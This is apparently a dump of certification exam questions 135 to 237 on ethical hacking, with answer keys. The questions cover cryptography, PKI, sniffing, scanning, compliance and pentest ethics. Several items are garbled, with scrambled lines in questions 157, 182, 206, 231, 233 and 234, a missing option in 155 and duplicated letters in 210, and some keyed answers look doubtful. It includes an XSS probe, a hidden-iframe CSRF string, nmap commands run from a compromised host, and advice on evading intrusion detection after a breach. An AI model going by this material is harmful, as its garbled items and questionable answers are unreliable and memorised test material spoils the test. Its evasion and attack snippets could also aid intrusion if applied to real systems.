Correct Answer: C
Section: (none)
Explanation
QUESTION 135
A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack
the passwords for the AD users?
A. Perform a dictionary attack.

B. Perform a brute force attack.
C. Perform an attack with a rainbowtable.
D. Perform a hybrid attack.
Correct Answer: C
Section: (none)
Explanation
QUESTION 136
Which of the following does proper basic configuration of snort as a network intrusion detection system require?
A. Limit the packets captured to the snort configuration file.

B. Capture every packet on the networksegment.
C. Limit the packets captured to a singlesegment.
D. Limit the packets captured to the /var/log/snort directory.
Correct Answer: A
Section: (none)
Explanation
QUESTION 137
How is sniffing broadly categorized?
A. Active and passive

B. Broadcast and unicast
C. Unmanaged and managed
D. Filtered and unfiltered
Correct Answer: A
Section: (none)
Explanation
QUESTION 138
What are the three types of authentication?
A. Something you: know, remember, prove

B. Something you: have, know, are
C. Something you: show, prove, are
D. Something you: show, have, prove
Correct Answer: B
Section: (none)
Explanation
QUESTION 139
The use of technologies like IPSec can help guarantee the following: authenticity, integrity, confidentiality and
A. non-repudiation.
B. operability.
C. security.
D. usability.
Correct Answer: A
Section: (none)
Explanation
QUESTION 140
What is the main disadvantage of the scripting languages as opposed to compiled programming languages?
A. Scripting languages are hard tolearn.

B. Scripting languages are not object-oriented.
C. Scripting languages cannot be used to create graphical user interfaces.
D. Scripting languages are slower because they require an interpreter to run the code.
Correct Answer: D
Section: (none)
Explanation
QUESTION 141
A botnet can be managed through which of the following?
A. IRC
B. E-Mail
C. Linkedin and Facebook
D. A vulnerable FTP server
Correct Answer: A
Section: (none)
Explanation
QUESTION 142
Fingerprinting VPN firewalls is possible with which of the following tools?
A. Angry IP
B. Nikto
C. Ike-scan
D. Arp-scan
Correct Answer: C
Section: (none)
Explanation
QUESTION 143
What is a successful method for protecting a router from potential smurf attacks?
A. Placing the router in broadcast mode

B. Enabling port forwarding on therouter
C. Installing the router outside of the network's firewall
D. Disabling the router from accepting broadcast ping messages
Correct Answer: D
Section: (none)
Explanation
QUESTION 144
Which of the following is optimized for confidential communications, such as bidirectional voice and video?
A. RC4
B. RC5
C. MD4
D. MD5
Correct Answer: A
Section: (none)
Explanation
QUESTION 145
Advanced encryption standard is an algorithm used for which of the following?
A. Data integrity
B. Key discovery
C. Bulk data encryption
D. Key recovery
Correct Answer: C
Section: (none)
Explanation
QUESTION 146
The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric
key cryptography uses which of the following?
A. Multiple keys for non-repudiation of bulk data

B. Different keys on both ends of the transportmedium
C. Bulk encryption for data transmission overfiber
D. The same key on each end of the transmission medium
Correct Answer: D
Section: (none)
Explanation
QUESTION 147
An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. The attacker can
now use which cryptanalytic technique to attempt todiscover the encryption key?
A. Birthday attack
B. Plaintext attack
C. Meet in the middle attack
D. Chosen ciphertext attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 148
What is the primary drawback to using advanced encryption standard (AES) algorithm with a 256 bit key to
share sensitive data?
A. Due to the key size, the time it will take to encrypt and decrypt the message hinders efficient
communication.
B. To get messaging programs to function with this algorithm requires complex configurations.
C. It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data.
D. It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel
than the message.
Correct Answer: D
Section: (none)
Explanation
QUESTION 149
A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of email. The
integrity of the encrypted email is dependent on thesecurity of which of thefollowing?
A. Public key
B. Private key
C. Modulus length
D. Email server certificate
Correct Answer: B
Section: (none)
Explanation
QUESTION 150
When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the
following is true?
A. The key entered is a symmetric key used to encrypt the wireless data.
B. The key entered is a hash that is used to prove the integrity of the wireless data.
C. The keyentered is based on the Diffie-Hellman method.
D. The key is an RSA key used to encrypt the wireless data.
Correct Answer: A
Section: (none)
Explanation
QUESTION 151
An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks below
is likely to be used to crack the target file?
A. Timing attack
B. Replay attack
C. Memory trade-off attack
D. Chosen plain-text attack
Correct Answer: D
Section: (none)
Explanation
QUESTION 152
Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and
that a certificate is still valid for specific operations?
A. Certificate issuance
B. Certificate validation
C. Certificate cryptography
D. Certificate revocation
Correct Answer: B
Section: (none)
Explanation
QUESTION 153
Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key
is stored to provide third-party access and to facilitaterecovery operations?
A. Key registry
B. Recovery agent
C. Directory
D. Key escrow
Correct Answer: D
Section: (none)
Explanation
QUESTION 154
To reduce the attack surface of a system, administrators should perform which of the following processes to
remove unnecessary software, services, and insecureconfiguration settings?
A. Harvesting
B. Windowing
C. Hardening
D. Stealthing
Correct Answer: C
Section: (none)
Explanation
QUESTION 155
Which of the following is a common Service Oriented Architecture (SOA) vulnerability?
B. SQL injection
C. VPath injection
D. XML denial of service issues
Correct Answer: D
Section: (none)
Explanation
QUESTION 156
The intrusion detection system at a software development company suddenly generates multiple alerts
regarding attacks against the company's external webserver,VPN concentrator, and DNS servers. What should
the security team do to determine which alerts to check first?
A. Investigate based on the maintenance schedule of the affected systems.

B. Investigate based on the service level agreements of the systems.
C. Investigate based on the potential effect of the incident.
D. Investigate based on the order that the alerts arrived in.
Correct Answer: C
Section: (none)
Explanation
QUESTION 157
company's web server is currently being hacked. What should the engineer do next?
An IT security engineer notices that the
company's web server.
A. Unplug the network connection on the

B. Determine the origin of the attack and launch a counterattack.
C. Record as much information as possible from the attack.
company's webserver.
D. Perform a system restart on the
Correct Answer: C
Section: (none)
Explanation
QUESTION 158
Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)?
A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for
reporting computer security incidents worldwide.
B. CSIRT provides a computer security surveillance service to supply a government with important intelligence
information on individuals travelling abroad.
C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by
individuals and multi-national corporations.
D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an
individual's property or company's asset.
Correct Answer: A
Section: (none)
Explanation
QUESTION 159
Which of the following items is unique to the N-tier architecture method of designing software applications?
A. Application layers can be separated, allowing each layer to be upgraded independently from other layers.
B. It is compatible with various databases including Access, Oracle, and SQL.
C. Data security is tied into each layer and must be updated for all layers when any upgrade is performed.
D. Application layers can be written in C, ASP.NET, or Delphi without any performance loss.
Correct Answer: A
Section: (none)
Explanation
QUESTION 160
If a tester is attempting to ping a target that exists but receives no response or a response that states the
destination is unreachable, ICMP may be disabled andthe network may be using TCP. Which other option
could the tester use to get a response from a host using TCP?
A. Hping
B. Traceroute
C. TCP ping
D. Broadcast ping
Correct Answer: A
Section: (none)
Explanation
QUESTION 161
Which of the following descriptions is true about a static NAT?
A. A static NAT uses a many-to-manymapping.

B. A static NAT uses a one-to-many mapping.
C. A static NAT uses a many-to-onemapping.
D. A static NAT uses a one-to-one mapping.
Correct Answer: D
Section: (none)
Explanation
QUESTION 162
Which of the following network attacks takes advantage of weaknesses in the fragment reassembly
functionality of the TCP/IP protocol stack?
A. Teardrop
B. SYN flood
C. Smurf attack
D. Ping of death
Correct Answer: A
Section: (none)
Explanation
QUESTION 163
Employees in a company are no longer able to access Internet web sites on their computers. The network
administrator is able to successfully ping IP address ofweb servers on the Internet and is able to open web sites
by using an IP address in place of the URL. The administrator runs the nslookup command for
www.eccouncil.org and receives an error message stating there is no response from the server. What should
the administrator do next?
A. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.
B. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.
C. Configure the firewall to allow traffic on TCP port 53.
D. Configure the firewall to allow traffic on TCP port 8080.
Correct Answer: A
Section: (none)
Explanation
QUESTION 164
While testing the company's web applications, a tester attempts to insert the following test script into the search
area on the company's web site:
<script>alert(" Testing Testing Testing ")</script>
Afterwards, when the tester presses the search button, a pop-up box appears on the screen with the text:
"Testing Testing Testing". Which vulnerability has beendetected in the web application?
A. Buffer overflow
B. Cross-site request forgery
C. Distributed denial of service
D. Cross-site scripting
Correct Answer: D
Section: (none)
Explanation
QUESTION 165
Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit?
A. They provide a repeatableframework.

B. Anyone can run the command linescripts.
C. They are available at lowcost.
D. They are subject to governmentregulation.
Correct Answer: A
Section: (none)
Explanation
QUESTION 166
The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web
applications by providing which one of the followingservices?
A. An extensible security framework named COBIT

B. A list of flaws and how to fix them
C. Web application patches
D. A security certification for hardened web applications
Correct Answer: B
Section: (none)
Explanation
QUESTION 167
In the OSI model, where does PPTP encryption take place?
A. Transport layer
B. Application layer
C. Data link layer
D. Network layer
Correct Answer: C
Section: (none)
Explanation
QUESTION 168
Which of the following is an example of IP spoofing?
A. SQL injections
B. Man-in-the-middle
C. Cross-site scripting
D. ARP poisoning
Correct Answer: B
Section: (none)
Explanation
QUESTION 169
For messages sent through an insecure channel, a properly implemented digital signature gives the receiver
reason to believe the message was sent by the claimed sender. While using a digital signature, the message
digest is encrypted with which key?
A. Sender's public key

B. Receiver's private key
C. Receiver's public key
D. Sender's private key
Correct Answer: D
Section: (none)
Explanation
QUESTION 170
Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an
appropriate method?
A. It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained.
B. If a user forgets the password, it can be easily retrieved using the hash key stored by administrators.
C. Hashing is faster compared to more traditional encryption algorithms.
D. Passwords stored using hashes are non-reversible, making finding the password much more difficult.
Correct Answer: D
Section: (none)
Explanation
QUESTION 171
Company A and Company B have just merged and each has its own Public Key Infrastructure (PKI). What
must the Certificate Authorities (CAs) establish so thatthe private PKIs for Company A and Company B trust
one another and each private PKI can validate digital certificates from the other company?
A. Poly key exchange

B. Cross certification
C. Poly key reference
D. Cross-site exchange
Correct Answer: B
Section: (none)
Explanation
QUESTION 172
Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (PKI)?
A. The root CA is the recovery agent used to encrypt data when a user's certificate is lost.
B. The root CA stores the user's hash value forsafekeeping.
C. The CA is the trusted root that issuescertificates.
D. The root CA is used to encrypt email messages to prevent unintended disclosure of data.
Correct Answer: C
Section: (none)
Explanation
QUESTION 173
A network security administrator is worried about potential man-in-the-middle attacks when users access a
corporate web site from their workstations. Which of thefollowing is the best remediation against this type of
attack?
A. Implementing server-side PKI certificates for all connections

B. Mandating only client-side PKI certificates for all connections
C. Requiring client and server PKI certificates for all connections
D. Requiring strong authentication for all DNS queries
Correct Answer: C
Section: (none)
Explanation
QUESTION 174
Which of the following levels of algorithms does Public Key Infrastructure (PKI) use?
A. RSA 1024 bit strength

B. AES 1024 bit strength
C. RSA 512 bit strength
D. AES 512 bit strength
Correct Answer: A
Section: (none)
Explanation
QUESTION 175
Which of the following is a characteristic of Public Key Infrastructure (PKI)?
A. Public-key cryptosystems are faster than symmetric-key cryptosystems.

B. Public-key cryptosystems distribute public-keys within digital signatures.
C. Public-key cryptosystems do not require a secure key distribution channel.
D. Public-key cryptosystems do not provide technical non-repudiation via digital signatures.
Correct Answer: B
Section: (none)
Explanation
QUESTION 176
Which security strategy requires using several, varying methods to protect IT systems against attacks?
A. Defense in depth
B. Three-way handshake
C. Covert channels
D. Exponential backoff algorithm
Correct Answer: A
Section: (none)
Explanation
QUESTION 177
SOAP services use which technology to format information?
A. SATA
B. PCI
C. XML
D. ISDN
Correct Answer: C
Section: (none)
Explanation
QUESTION 178
Which statement best describes a server type under an N-tier architecture?
A. A group of servers at a specific layer

B. A single server with a specific role
C. A group of servers with a uniquerole
D. A single server at a specific layer
Correct Answer: C
Section: (none)
Explanation
QUESTION 179
If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry
point that was used duringthe application development, what is this secret entry point known as?
A. SDLC process
B. Honey pot
C. SQL injection
D. Trap door
Correct Answer: D
Section: (none)
Explanation
QUESTION 180
A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless
access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the
Internet. When the technician examines the IP address and default gatewaythey are both on the
192.168.1.0/24. Which of the following has occurred?
A. The gateway is not routing to a public IP address.

B. The computer is using an invalid IPaddress.
C. The gateway and the computer are not on the same network.
D. The computer is not using a private IPaddress.
Correct Answer: A
Section: (none)
Explanation
QUESTION 181
Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP
specifications?
A. Ping of death
B. SYN flooding
C. TCP hijacking
D. Smurf attack
Correct Answer: A
Section: (none)
Explanation
QUESTION 182
network's IDS?
Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the
A. Timing options to slow the speed that the port scan is conducted
B. Fingerprinting to identify which operating systems are running on the network
C. ICMP ping sweep to determine which hosts on the network are not available
D. Traceroute to control the path of the packets sent during the scan
Correct Answer: A
Section: (none)
Explanation
QUESTION 183
When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open
Source Security Testing MethodologyManual (OSSTMM) the main difference is
A. OWASP is for web applications and OSSTMM does not include web applications.
B. OSSTMM is gray box testing and OWASP is black box testing.
C. OWASP addresses controls and OSSTMM does not.
D. OSSTMM addresses controls and OWASP does not.
Correct Answer: D
Section: (none)
Explanation
QUESTION 184
Which Open Web Application Security Project (OWASP) implements a web application full of known
vulnerabilities?
A. WebBugs
B. WebGoat
C. VULN_HTML
D. WebScarab
Correct Answer: B
Section: (none)
Explanation
QUESTION 185
What are the three types of compliance that the Open Source Security Testing Methodology Manual
(OSSTMM) recognizes?
A. Legal, performance, audit

B. Audit, standards based, regulatory
C. Contractual, regulatory,industry
D. Legislative, contractual, standardsbased
Correct Answer: D
Section: (none)
Explanation
QUESTION 186
Which of the following algorithms provides better protection against brute force attacks by using a 160-bit
message digest?
A. MD5
B. SHA-1
C. RC4
D. MD4
Correct Answer: B
Section: (none)
Explanation
QUESTION 187
Which cipher encrypts the plain text digit (bit or byte) one by one?
A. Classical cipher
B. Block cipher
C. Modern cipher
D. Stream cipher
Correct Answer: D
Section: (none)
Explanation
QUESTION 188
Which of the following can take an arbitrary length of input and produce a message digest output of 160 bit?
A. SHA-1
B. MD5
C. HAVAL
D. MD4
Correct Answer: A
Section: (none)
Explanation
QUESTION 189
Which element of Public Key Infrastructure (PKI) verifies the applicant?
A. Certificate authority
B. Validation authority
C. Registration authority
D. Verification authority
Correct Answer: C
Section: (none)
Explanation
QUESTION 190
Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide?
A. Incident response services to any user, company, government agency, or organization in partnership with
the Department of Homeland Security nation's Internet infrastructure, builds out new Internet infrastructure,
and decommissions old Internet infrastructure
B. Maintenance of the
C. Registration of critical penetration testing for the Department of Homeland Security and public and private
sectors
D. Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State
Department, as well as private sectors
Correct Answer: A
Section: (none)
Explanation
QUESTION 191
How do employers protect assets with security policies pertaining to employee surveillance activities?
A. Employers promote monitoring activities of employees as long as the employees demonstrate

trustworthiness.
B. Employers use informal verbal communication channels to explain employee monitoring activities to
employees.
C. Employers use network surveillance to monitor employee email traffic, network access, and to record
employee keystrokes.
D. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities
and consequences.
Correct Answer: D
Section: (none)
Explanation
QUESTION 192
Which of the following ensures that updates to policies, procedures, and configurations are made in a
controlled and documented fashion?
A. Regulatory compliance
B. Peer review
C. Change management
D. Penetration testing
Correct Answer: C
Section: (none)
Explanation
QUESTION 193
Which of the following tools would be the best choice for achieving compliance with PCI Requirement 11?
A. Truecrypt
B. Sub7
C. Nessus
D. Clamwin
Correct Answer: C
Section: (none)
Explanation
QUESTION 194
When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations to perform
external and internal penetration testing?
A. At least once a year and after any significant upgrade or modification

B. At least once every three years or after any significant upgrade or modification
C. At least twice a year or after any significant upgrade or modification
D. At least once every two years and after any significant upgrade or modification
Correct Answer: A
Section: (none)
Explanation
QUESTION 195
Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial
Officer (CFO) must sign statements verifyingthe completeness and accuracy of financial reports?
A. Sarbanes-Oxley Act (SOX)

B. Gramm-Leach-Bliley Act (GLBA)
C. Fair and Accurate Credit Transactions Act(FACTA)
D. Federal Information Security Management Act (FISMA)
Correct Answer: A
Section: (none)
Explanation
QUESTION 196
How can a policy help improve an employee's security awareness?
A. By implementing written security procedures, enabling employee security training, and promoting the
benefits of security
B. By using informal networks of communication, establishing secret passing procedures, and immediately
terminating employees
C. By sharing security secrets with employees, enabling employees to share secrets, and establishing a
consultative help line
D. By decreasing an employee's vacation time, addressing ad-hoc employment clauses, and ensuring that
managers know employee strengths
Correct Answer: A
Section: (none)
Explanation
QUESTION 197
Which method can provide a better return on IT security investment and provide a thorough and
comprehensive assessment of organizationalsecurity covering policy, procedure design, and implementation?
A. Penetration testing
B. Social engineering
C. Vulnerability scanning
D. Access control list reviews
Correct Answer: A
Section: (none)
Explanation
QUESTION 198
Which of the following guidelines or standards is associated with the credit card industry?
A. Control Objectives for Information and Related Technology (COBIT)

B. Sarbanes-Oxley Act (SOX)
C. Health Insurance Portability and Accountability Act (HIPAA)
D. Payment Card Industry Data Security Standards (PCI DSS)
Correct Answer: D
Section: (none)
Explanation
QUESTION 199
International Organization for Standardization (ISO) standard 27002 provides guidance for compliance by
outlining
A. guidelines and practices for security controls.

B. financial soundness and business viability metrics.
C. standard best practice for configurationmanagement.
D. contract agreement writing standards.
Correct Answer: A
Section: (none)
Explanation
QUESTION 200
Which type of security document is written with specific step-by-step details?
A. Process
B. Procedure
C. Policy
D. Paradigm
Correct Answer: B
Section: (none)
Explanation
QUESTION 201
An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk
assessments. A friend recently started a company andasks the hacker to perform a penetration test and
vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting
work on this job?
A. Start by foot printing the network and mapping out a plan of attack.
B. Ask the employer for authorization to perform the work outside the company.
C. Begin the reconnaissance phase with passive information gathering and then move into active information
gathering.
D. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible
to attack.
Correct Answer: B
Section: (none)
Explanation
QUESTION 202
A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost
two months ago, but has yet to get paid. The customeris suffering from financial problems, and the CEH is
worried that the company will go out of business and end up not paying. What actions should the CEH take?
A. Threaten to publish the penetration test results if not paid.

B. Follow proper legal procedures against the company to request payment.
C. Tell other customers of the financial problems with payments from this company.
D. Exploit some of the vulnerabilities found on the company webserver to deface it.
Correct Answer: B
Section: (none)
Explanation
QUESTION 203
Which initial procedure should an ethical hacker perform after being brought into an organization?
A. Begin security testing.
B. Turn over deliverables.
C. Sign a formal contract withnon-disclosure.
D. Assess what the organization is trying to protect.
Correct Answer: C
Section: (none)
Explanation
QUESTION 204
A consultant has been hired by the V.P. of a large financial organization to assess the company's security
posture. During the security testing, the consultant comes
across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial
organization?
A. Say nothing and continue with the security testing.

B. Stop work immediately and contact the authorities.
C. Delete the pornography, say nothing, and continue security testing.
D. Bring the discovery to the financial organization's human resource department.
Correct Answer: B
Section: (none)
Explanation
QUESTION 205
A computer technician is using a new version of a word processing software package when it is discovered that
a special sequence of characters causes the entirecomputer to crash. The technician researches the bug and
discovers that no one else experienced the problem. What is the appropriate next step?
A. Ignore the problem completely and let someone else deal with it.
B. Create a document that will crash the computer when opened and send it to friends.
C. Find an underground bulletin board and attempt to sell the bug to the highest bidder.
D. Notify the vendor of the bug and do not disclose it until the vendor gets a chance to issue a fix.
Correct Answer: D
Section: (none)
Explanation
QUESTION 206
A certified ethical hacker (CEH) is approached by a friend who believes her husband is cheating. She offers to
pay to break into her husband's email account inorder to find proof so she can take him to court. What is the
ethical response?
A. Say no; the friend is not the owner of the account.

B. Say yes; the friend needs help to gather evidence.
C. Say yes; do the job forfree.
she's asking the CEH to take.
D. Say no; make sure that the friend knows the risk
Correct Answer: A
Section: (none)
Explanation
QUESTION 207
It is an entity or event with the potential to adversely impact a system through unauthorized access, destruction,
disclosure, denial of service or modification of data.
Which of the following terms best matches thedefinition?
A. Threat
B. Attack
C. Vulnerability
D. Risk
Correct Answer: A
Section: (none)
Explanation
QUESTION 208
As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment
through penetration testing.
What document describes the specifics of the testing, the associated violations, and essentially protects both
the organization's interest and your liabilities as atester?
A. Terms of Engagement
B. Project Scope
C. Non-Disclosure Agreement
D. Service Level Agreement
Correct Answer: A
Section: (none)
Explanation
QUESTION 209
Initiating an attack against targeted businesses and organizations, threat actors compromise a carefully
selected website by inserting an exploit resulting in malwareinfection. The attackers run exploits on well-known
and trusted sites likely to be visited by their targeted victims. Aside from carefully choosing sites to compromise,
these attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the
targeted entities are left with little or no defense against these exploits.
What type of attack is outlined in the scenario?
A. Watering Hole Attack

B. Heartbleed Attack
C. Shellshock Attack
D. Spear Phising Attack
Correct Answer: A
Section: (none)
Explanation
QUESTION 210
You have successfully gained access to your client's internal network and successfully comprised a Linux
server which is part of the internal IP network. You wantto know which Microsoft Windows workstations have
file sharing enabled.
Which port would you see listening on these Windows machines in the network?A. 445
A. 3389
B. 161
C. 1433
Correct Answer: A
Section: (none)
Explanation
QUESTION 211
It is a short-range wireless communication technology intended to replace the cables connecting portable of
fixed devices while maintaining high levels of security. It allows mobile phones, computers and other devices to
connect and communicate using a short-range wireless connection.
Which of the following terms best matches the definition?
A. Bluetooth
B. Radio-FrequencyIdentification
C. WLAN
D. InfraRed
Correct Answer: A
Section: (none)
Explanation
QUESTION 212
A hacker has successfully infected an internet-facing server which he will then use to send junk mail, take part
in coordinated attacks, or host junk email
content.Which sort of trojan infects this server?
A. Botnet Trojan
B. Turtle Trojans
C. Banking Trojans
D. Ransomware Trojans
Correct Answer: A
Section: (none)
Explanation
QUESTION 213
You have compromised a server and successfully gained a root access. You want to pivot and pass traffic
undetected over the network and evade any possibleIntrusion Detection System.
What is the best approach?
A. Install Cryptcat and encrypt outgoing packets from this server.

B. Install and use Telnet to encrypt all outgoing traffic from this server.
C. Use Alternate Data Streams to hide the outgoing packets from this server.
D. Use HTTP so that all traffic can be routed via a browser, thus evading the internal Intrusion Detection
Systems.
Correct Answer: A
Section: (none)
Explanation
QUESTION 214
It is a kind of malware (malicious software) that criminals install on your computer so they can lock it from a
remote location. This malware generates a pop-up window, webpage, or email warning from what looks like an
official authority. It explains that your computer has been locked because of possible illegal activities on it and
demands payment before you can access your files and programs again.
Which of the following terms best matches the definition?
A. Ransomware
B. Adware
C. Spyware
D. Riskware
Correct Answer: A
Section: (none)
Explanation
QUESTION 215
You have successfully comprised a server having an IP address of 10.10.0.5. You would like to enumerate all
machines in the same network quickly.What is
the best nmap command you will use?
A. nmap -T4 -F 10.10.0.0/24

B. nmap -T4 -r 10.10.1.0/24
C. nmap -T4 -O 10.10.0.0/24
D. nmap -T4 -q 10.10.0.0/24
Correct Answer: A
Section: (none)
Explanation
QUESTION 216
You have compromised a server on a network and successfully opened a shell. You aimed to identify all
operating systems running on the network. However, as you attempt to fingerprint all machines in the network
using the nmap syntax below, it is not going through.
invictus@victim_server:~$ nmap -T4 -O 10.10.0.0/24
TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx xxxxxxxxx.

QUITTING!
What seems to be wrong?
A. OS Scan requires root privileges.

B. The nmap syntax is wrong.
C. This is a common behavior for a corrupted nmapapplication.
D. The outgoing TCP/IP fingerprinting is blocked by the host firewall.
Correct Answer: A
Section: (none)
Explanation
QUESTION 217
Which of the following statements is TRUE?
A. Sniffers operate on Layer 2 of the OSImodel

B. Sniffers operate on Layer 3 of the OSImodel
C. Sniffers operate on both Layer 2 & Layer 3 of the OSI model.
D. Sniffers operate on the Layer 1 of the OSI model.
Correct Answer: A
Section: (none)
Explanation
QUESTION 218
You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management
Console from command line. Which
command would you use?
A. c:\compmgmt.msc
B. c:\services.msc
C. c:\ncpa.cp
D. c:\gpedit
Correct Answer: A
Section: (none)
Explanation
QUESTION 219
What is the best description of SQL Injection?
A. It is an attack used to gain unauthorized access to a database.

B. It is an attack used to modify code in an application.
C. It is a Man-in-the-Middle attack between your SQL Server and Web App Server.
D. It is a Denial of Service Attack.
Correct Answer: A
Section: (none)
Explanation
QUESTION 220
Which of the following is the BEST way to defend against network sniffing?
A. Using encryption protocols to secure network communications

B. Register all machines MAC Address in a Centralized Database
C. Restrict Physical Access to Server Rooms hosting Critical Servers
D. Use Static IP Address
Correct Answer: A
Section: (none)
Explanation
QUESTION 221
You have successfully gained access to a linux server and would like to ensure that the succeeding outgoing
traffic from this server will not be caught by a NetworkBased Intrusion Detection Systems (NIDS).
What is the best way to evade the NIDS?
A. Encryption
B. Protocol Isolation
C. Alternate Data Streams
D. Out of band signalling
Correct Answer: A
Section: (none)
Explanation
QUESTION 222
You just set up a security system in your network. In what kind of system would you find the following string of
characters used as a rule within its
configuration?alert tcp any any -> 192.168.100.0/24 21 (msg: "FTP on the network!";)
A. An Intrusion Detection System

B. A firewall IPTable
C. A Router IPTable
D. FTP Server rule
Correct Answer: A
Section: (none)
Explanation
QUESTION 223
What is the benefit of performing an unannounced Penetration Testing?
A. The tester will have an actual security posture visibility of the target network.
B. Network security would be in a "best state" posture.
C. It is best to catch critical infrastructure unpatched.
D. The tester could not provide an honest analysis.
Correct Answer: A
Section: (none)
Explanation
QUESTION 224
You have successfully compromised a machine on the network and found a server that is alive on the same
network. You tried to ping it but you didn't get anyresponse back.
What is happening?
A. ICMP could be disabled on the target server.

B. The ARP is disabled on the targetserver.
C. TCP/IP doesn't support ICMP.
D. You need to run the ping command with root privileges.
Correct Answer: A
Section: (none)
Explanation
QUESTION 225
Under the "Post-attack Phase and Activities", it is the responsibility of the tester to restore the systems to a pre-
test state.Which of the following activities
should not be included in this phase? (see exhibit)
Exhibit:
A. III
B. IV
C. III and IV
D. All should be included.
Correct Answer: A
Section: (none)
Explanation
QUESTION 226
It is a regulation that has a set of guidelines, which should be adhered to by anyone who handles any electronic
medical data. These guidelines stipulate that all medical practices must ensure that all necessary measures are
in place while saving, accessing, and sharing any electronic medical data to keep patient datasecure.
Which of the following regulations best matches the description?
A. HIPAA
B. ISO/IEC 27002
C. COBIT
D. FISMA
Correct Answer: A
Section: (none)
Explanation
QUESTION 227
Which of the following is a component of a risk assessment?
A. Administrative safeguards
B. Physical security
C. DMZ
D. Logical interface
Correct Answer: A
Section: (none)
Explanation
QUESTION 228
A medium-sized healthcare IT business decides to implement a risk management strategy.Which of the
following is NOT one of the five basic responses to
risk?
A. Delegate
B. Avoid
C. Mitigate
D. Accept
Correct Answer: A
Section: (none)
Explanation
QUESTION 229
Your company was hired by a small healthcare provider to perform a technical assessment on the
network.What is the best approach for discovering
vulnerabilities on a Windows-based computer?
A. Use a scan tool like Nessus

B. Use the built-in Windows Updatetool
C. Check MITRE.org for the latest list of CVEfindings
D. Create a disk image of a clean Windows installation
Correct Answer: A
Section: (none)
Explanation
QUESTION 230
Nation-state threat actors often discover vulnerabilities and hold on to them until they want to launch a
sophisticated attack. The Stuxnet attack was an unprecedented style of attack because it used four types of
vulnerability.
What is this style of attack called?
A. zero-day
B. zero-hour
C. zero-sum
D. no-day
Correct Answer: A
Section: (none)
Explanation
QUESTION 231
g to update the victim's profile to a
An attacker changes the profile information of a particular user (victim) on the target website. The attacker uses
this strin attacker's database.
text fileand then submit the data to the
<iframe src="http://www.vulnweb.com/updateif.php" style="display:none"></iframe>What is this type of attack

(that can use either HTTP GET or HTTP
POST) called?
A. Cross-Site Request Forgery

B. Cross-Site Scripting
C. SQL Injection
D. Browser Hacking
Correct Answer: A
Section: (none)
Explanation
QUESTION 232
It is a vulnerability in GNU's bash shell, discovered in September of 2014, that gives attackers access to run
remote commands on a vulnerable system. The malicious software can take control of an infected machine,
launch denial-of-service attacks to disrupt websites, and scan for other vulnerable devices (includingrouters).
Which of the following vulnerabilities is being described?
A. Shellshock
B. Rootshock
C. Rootshell
D. Shellbash
Correct Answer: A
Section: (none)
Explanation
QUESTION 233
When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is
someone you did business with recently, but the subjectline has strange characters in it.
What should you do?
company's security response team and permanently delete the message from your computer.
A. Forward the message to your

B. Reply to the sender and ask them for more information about the message contents.
C. Delete the email and pretend nothing happened
D. Forward the message to your supervisor and ask for her opinion on how to handle the situation
Correct Answer: A
Section: (none)
Explanation
QUESTION 234
The network administrator contacts you and tells you that she noticed the temperature on the internal wireless
router increases by more than 20% during she doesn't have
weekendhours when the office was closed. She asks you to investigate the issue because she is busy dealing
with a big conference and time to perform the task.
What tool can you use to view the network traffic being sent and received by the wireless router?
A. Wireshark
B. Nessus
C. Netcat
D. Netstat
Correct Answer: A
Section: (none)
Explanation
QUESTION 235
A regional bank hires your company to perform a security assessment on their network after a recent data
breach. The attacker was able to steal financial data fromthe bank by compromising only a single server.
Based on this information, what should be one of your key recommendations to the bank?
A. Place a front-end web server in a demilitarized zone that only handles external web traffic
B. Require all employees to change their passwords immediately
C. Move the financial data to another server on the same IP subnet
D. Issue new certificates to the web servers from the root certificate authority
Correct Answer: A
Section: (none)
Explanation
QUESTION 236
Port scanning can be used as part of a technical assessment to determine network vulnerabilities. The TCP
XMAS scan is used to identify listening ports on thetargeted system.
If a scanned port is open, what happens?
A. The port will ignore the packets.

B. The port will send an RST.
C. The port will send an ACK.
D. The port will send a SYN.
Correct Answer: A
Section: (none)
Explanation
QUESTION 237
During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a
Demilitarized Zone (DMZ) and a second DNS serveron the internal network.
